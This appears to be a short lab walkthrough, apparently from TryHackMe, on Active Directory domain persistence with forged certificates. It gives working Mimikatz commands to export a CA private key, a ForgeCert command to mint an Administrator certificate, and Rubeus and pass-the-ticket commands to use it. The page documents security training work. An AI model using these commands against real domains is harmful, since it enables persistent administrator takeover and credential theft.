Persistence on the Domain

Step 1: Extract Root CA Certificate and Private Key

Enumerate certificates in the local machine store:

mimikatz # crypto::certificates /systemstore:local_machine

Enable necessary privileges:
```
mimikatz # privilege::debug
```
Load cryptographic API for extraction:
```
mimikatz # crypto::capi
```

Export certificates (PFX and DER formats):

mimikatz # crypto::certificates /systemstore:local_machine /export

Step 2: Generate Custom Certificates

Use ForgeCert to generate a certificate for persistence:

C:\Tools\ForgeCert\ForgeCert.exe --CaCertPath za-THMDC-CA.pfx --CaCertPassword mimikatz --Subject CN=User --SubjectAltName Administrator@za.tryhackme.loc --NewCertPath fullAdmin.pfx --NewCertPassword Password123

Step 3: Obtain a Ticket-Granting Ticket (TGT)

Use the generated certificate with Rubeus to request a TGT:

C:\Tools\Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:za.tryhackme.loc /dc:<IP of domain controller>

Step 4: Use the TGT

Inject the TGT using Mimikatz:

kerberos::ptt administrator.kirbi

PreviousSID history NextTicket

Last updated 9 months ago

hashtagStep 2: Generate Custom Certificates

hashtagStep 3: Obtain a Ticket-Granting Ticket (TGT)

hashtagStep 4: Use the TGT

Step 2: Generate Custom Certificates

Step 3: Obtain a Ticket-Granting Ticket (TGT)

Step 4: Use the TGT